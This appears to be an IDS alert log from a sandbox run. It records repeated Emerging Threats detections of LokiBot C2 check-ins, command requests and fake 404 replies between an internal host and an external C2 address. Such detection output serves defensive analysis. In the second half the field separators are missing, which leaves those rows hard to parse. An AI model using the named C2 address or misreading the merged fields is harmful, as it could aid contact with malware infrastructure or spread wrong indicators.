01/05/21-19:06:56.594263 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49293 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:56.594263 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49293 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:56.594263 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49293 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:56.594263 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49293 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:56.764004 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49293 | 185.206.215.56 | 192.168.2.22
01/05/21-19:06:56.973338 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49294 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:56.973338 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49294 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:56.973338 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49294 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:56.973338 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49294 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:57.143234 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49294 | 185.206.215.56 | 192.168.2.22
01/05/21-19:06:57.346021 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49295 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:57.346021 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49295 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:57.346021 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49295 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:57.346021 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49295 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:57.532123 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49295 | 185.206.215.56 | 192.168.2.22
01/05/21-19:06:57.742988 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49296 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:57.742988 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49296 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:57.742988 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49296 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:57.742988 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49296 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:57.910447 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49296 | 185.206.215.56 | 192.168.2.22
01/05/21-19:06:58.107472 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49297 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:58.107472 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49297 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:58.107472 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49297 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:58.107472 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49297 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:58.291278 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49297 | 185.206.215.56 | 192.168.2.22
01/05/21-19:06:58.499485 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49298 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:58.499485 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49298 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:58.499485 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49298 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:58.499485 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49298 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:58.677455 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49298 | 185.206.215.56 | 192.168.2.22
01/05/21-19:06:58.918368 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49299 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:58.918368 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49299 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:58.918368 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49299 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:58.918368 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49299 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:59.104108 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49299 | 185.206.215.56 | 192.168.2.22
01/05/21-19:06:59.313559 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49300 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:59.313559 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49300 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:59.313559 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49300 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:59.313559 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49300 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:59.474234 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49300 | 185.206.215.56 | 192.168.2.22
01/05/21-19:06:59.687246 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49301 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:59.687246 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49301 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:59.687246 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49301 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:59.687246 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49301 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:59.847928 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49301 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:00.058160 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49302 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:00.058160 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49302 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:00.058160 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49302 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:00.058160 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49302 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:00.228246 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49302 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:00.450812 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49303 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:00.450812 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49303 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:00.450812 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49303 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:00.450812 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49303 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:00.618919 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49303 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:00.828363 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49304 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:00.828363 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49304 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:00.828363 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49304 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:00.828363 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49304 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:00.993556 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49304 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:01.210699 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49305 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:01.210699 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49305 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:01.210699 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49305 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:01.210699 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49305 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:01.363213 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49305 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:01.575817 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49306 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:01.575817 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49306 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:01.575817 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49306 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:01.575817 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49306 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:01.750904 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49306 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:01.975553 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49307 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:01.975553 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49307 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:01.975553 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49307 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:01.975553 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49307 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:02.132845 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49307 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:02.334169 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49308 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:02.334169 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49308 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:02.334169 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49308 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:02.334169 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49308 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:02.488881 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49308 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:02.695433 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49309 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:02.695433 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49309 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:02.695433 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49309 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:02.695433 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49309 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:02.863488 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49309 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:03.081979 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49310 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:03.081979 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49310 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:03.081979 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49310 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:03.081979 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49310 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:03.240915 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49310 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:03.437460 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49311 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:03.437460 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49311 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:03.437460 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49311 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:03.437460 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49311 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:03.601073 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49311 | 185.206.215.56 | 192.168.2.22
01/05/21-19:07:03.817487 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49312 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:03.817487 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49312 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:07:03.817487 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49312 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:07:03.817487TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:03.979353TCP2025483ET TROJAN LokiBot Fake 404 Response8049312185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:04.190227TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.190227TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.190227TCP2025381ET TROJAN LokiBot Checkin4931380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.190227TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.351678TCP2025483ET TROJAN LokiBot Fake 404 Response8049313185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:04.554889TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.554889TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.554889TCP2025381ET TROJAN LokiBot Checkin4931480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.554889TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.731423TCP2025483ET TROJAN LokiBot Fake 404 Response8049314185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:04.946051TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.946051TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.946051TCP2025381ET TROJAN LokiBot Checkin4931580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.946051TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:05.124758TCP2025483ET TROJAN LokiBot Fake 404 Response8049315185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:05.334400TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:05.334400TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:05.334400TCP2025381ET TROJAN LokiBot Checkin4931680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:05.334400TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:05.505004TCP2025483ET TROJAN LokiBot Fake 404 Response8049316185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:05.711231TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:05.711231TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:05.711231TCP2025381ET TROJAN LokiBot Checkin4931780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:05.711231TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:05.862498TCP2025483ET TROJAN LokiBot Fake 404 Response8049317185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:06.056308TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.056308TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.056308TCP2025381ET TROJAN LokiBot Checkin4931880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.056308TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.254066TCP2025483ET TROJAN LokiBot Fake 404 Response8049318185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:06.456725TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.456725TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.456725TCP2025381ET TROJAN LokiBot Checkin4931980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.456725TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.617598TCP2025483ET TROJAN LokiBot Fake 404 Response8049319185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:06.823587TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.823587TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.823587TCP2025381ET TROJAN LokiBot Checkin4932080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.823587TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.974484TCP2025483ET TROJAN LokiBot Fake 404 Response8049320185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:07.184056TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.184056TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.184056TCP2025381ET TROJAN LokiBot Checkin4932180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.184056TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.346312TCP2025483ET TROJAN LokiBot Fake 404 Response8049321185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:07.553003TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.553003TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.553003TCP2025381ET TROJAN LokiBot Checkin4932280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.553003TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.742274TCP2025483ET TROJAN LokiBot Fake 404 Response8049322185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:07.954109TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.954109TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.954109TCP2025381ET TROJAN LokiBot Checkin4932380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.954109TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:08.126146TCP2025483ET TROJAN LokiBot Fake 404 Response8049323185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:08.324968TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:08.324968TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:08.324968TCP2025381ET TROJAN LokiBot Checkin4932480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:08.324968TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:08.523216TCP2025483ET TROJAN LokiBot Fake 404 Response8049324185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:08.752322TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:08.752322TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:08.752322TCP2025381ET TROJAN LokiBot Checkin4932580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:08.752322TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:08.911141TCP2025483ET TROJAN LokiBot Fake 404 Response8049325185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:09.107951TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.107951TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.107951TCP2025381ET TROJAN LokiBot Checkin4932680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.107951TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.274146TCP2025483ET TROJAN LokiBot Fake 404 Response8049326185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:09.490262TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.490262TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.490262TCP2025381ET TROJAN LokiBot Checkin4932780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.490262TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.668226TCP2025483ET TROJAN LokiBot Fake 404 Response8049327185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:09.873125TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.873125TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.873125TCP2025381ET TROJAN LokiBot Checkin4932880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.873125TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:10.024941TCP2025483ET TROJAN LokiBot Fake 404 Response8049328185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:10.232858TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:10.232858TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:10.232858TCP2025381ET TROJAN LokiBot Checkin4932980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:10.232858TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:10.470073TCP2025483ET TROJAN LokiBot Fake 404 Response8049329185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:10.663115TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:10.663115TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:10.663115TCP2025381ET TROJAN LokiBot Checkin4933080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:10.663115TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:10.820501TCP2025483ET TROJAN LokiBot Fake 404 Response8049330185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:11.027929TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.027929TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.027929TCP2025381ET TROJAN LokiBot Checkin4933180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.027929TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.198428TCP2025483ET TROJAN LokiBot Fake 404 Response8049331185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:11.409139TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.409139TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.409139TCP2025381ET TROJAN LokiBot Checkin4933280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.409139TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.568467TCP2025483ET TROJAN LokiBot Fake 404 Response8049332185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:11.779641TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.779641TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.779641TCP2025381ET TROJAN LokiBot Checkin4933380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.779641TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.948839TCP2025483ET TROJAN LokiBot Fake 404 Response8049333185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:12.151046TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.151046TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933480192.168.2.22185.206.215.56
